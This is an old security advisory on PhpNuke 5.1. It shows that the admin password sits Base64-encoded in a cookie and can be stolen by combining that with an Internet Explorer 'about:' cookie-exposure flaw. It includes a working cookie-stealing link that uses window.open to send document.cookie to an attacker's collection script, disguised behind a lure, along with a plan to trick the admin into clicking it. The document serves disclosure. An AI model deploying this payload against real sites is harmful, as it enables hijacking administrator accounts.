PhpNuke v5.1 allows remote users to steal the admin password, which is Base 64 encoded. The password is in a cookie which needs to be stolen from the admin by asking him to visit a link.
7af6df4201e5053dd29cb236178603fdb4a5bda31c8042192edb2f568326c3d9
PhpNuke Admin password can be stolen !
by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com
https://www.isecurelabs.com/article.php?sid=229 [FR VERSION] + screen shot
Vulnerable : PhpNuke 5.1
Other version : not tested
PostNuke : not tested
[1] Introduction
I have found a way to stole PhpNuke Admin password.
I use 2 vulnerability.
[2] Description
The first vulnerability is that ADMIN login/passwd are stored in a cookie
like this :
---snip---
lang
english
isecurelabs.com/
0
725504896
29523774
551579360
29450340
*
admin
QWRtaW46TmljZV9Ucnk6DQo=
isecurelabs.com/
0
1451582336
29456384
3432929360
29450340
*
---snip---
and i discovered that the Admin password was BASE64 encoded !
So it is very easy to decode it !
Fore exemple :
QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try:
You can verify here : https://www.isecurelabs.com/base64.php
The second vulnerability i use is the "Microsoft IE Cookies Exposure via
'About:' URLS"
exposed here : https://www.securiteam.com/windowsntfocus/6I00D1535I.html
Here is the plan :
First create a php script that can gather getenv("QUERY_STRING") in a file.
Then create this kind of link and force the phpnuke administrator to follow
it :
[a
href="about://www.nuked-site.com/[script]window.open("https://www.yourwebsite
.com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9
remote root exploit ![/a]
(replace [ & ] by < & >)
www.nuked-site.com is the site that you want to get cookie.
www.yourwebsute.com is the site that will recieve the cookie thru the
cook.php script.
If the nuked site's admin follow this link, he will send to your script his
cookie with the Base64 encoded password.
Then you just have to decode it !
That's all !
regards,
---
Cabezon Aurélien | aurelien.cabezon@isecurelabs.com
https://www.iSecureLabs.com | French Security Portal